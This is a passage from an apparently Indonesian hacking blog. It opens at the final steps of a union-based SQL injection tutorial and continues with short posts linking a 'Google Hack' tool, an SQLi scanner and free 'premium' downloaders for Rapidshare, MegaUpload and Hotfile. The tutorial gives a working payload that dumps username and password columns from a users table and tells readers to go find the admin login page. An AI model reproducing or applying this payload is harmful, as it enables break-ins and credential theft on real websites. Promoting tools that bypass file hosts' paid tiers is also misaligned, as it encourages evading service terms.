10. nah setelah itu akan ad beberapa colum tentang username, password, email, etc.
lalu dibagian group_concat(column_name) . dibagian merah ubah dengan diisikan column username dan password contoh:
group_concat(username,0x3a,password)
<- setiap ingin menambahkan column, tambahkan koma (,) dan 0x3a
lalu ubah: information_schema.columns where table_name=0x7573657273-- dengan nama table yang barusan di hex (contoh yang ini users)
maka from users--

example:
http://site.com/index.php?id=-1 union all select 1,group_concat(username,0x3a,password)3 from users--

11. lalu akan keluar username dan password yang kemungkinan ad username admin dengan password admin
12. silahkan cari sendiri halaman login admin..
13 Enjoy~~

sumber : wild-hack.blogspot.com

Google Hack

2011-01-03T21:33:00.002+07:00

pastinya kita kenal yang namanya google..

google itu semacam mesin pencari yang sering kita jumpai di berbagai pengguna internet di dalam negeri maupun luar negeri. kita mencari sebuah artikel lewat google dengan cara ketik text, tapi apabila anda mau mencari lebih De-tail, silahkan gunakan Apps Google Hacks

klik disini buat download nya

sorry ga ada ss nya kk.

SQLi scanner.

2011-01-03T20:24:00.002+07:00

untuk mencari bug sqli
KLIK

Download Premium MegaUpload , Rapidshare, Hotfile.

2010-12-20T17:20:00.004+07:00

Saya punya kabar gembira nih buat downloader maniak, sekarang ada tools download premium untuk Rapidshare, Megaupload, Hotfile. Tanpa repot menginstall aplikasi apapun kita sudah bisa mendonwload file hosting tersebut dengan layanan premium.

muplg.com untuk dowload premium MegaUpload
rsplg.com untuk dowload premium Rapidshare
hfplg.com untuk dowload premium Hotfile

Ketiga link diatas bisa di gunakan untuk download dengan layanan premium secara cuma -cuma
Cara nya mudah kuk tinggal inputkan link rapidshare atau megaupload dan hotfile anda kedalam form downloader sesuai dengan ketiga link di atas masukan Security Code trus klik download it ukup mudah bukan

Nonton Tv di Facebook

2010-12-18T19:48:00.001+07:00

postingan pertama di blog ini. haha.
istilah nya pertamaxxx gan. wkakakak. oke langsung aja gan cekitod. eh salah. cekidot
klik_disini
buka aja gan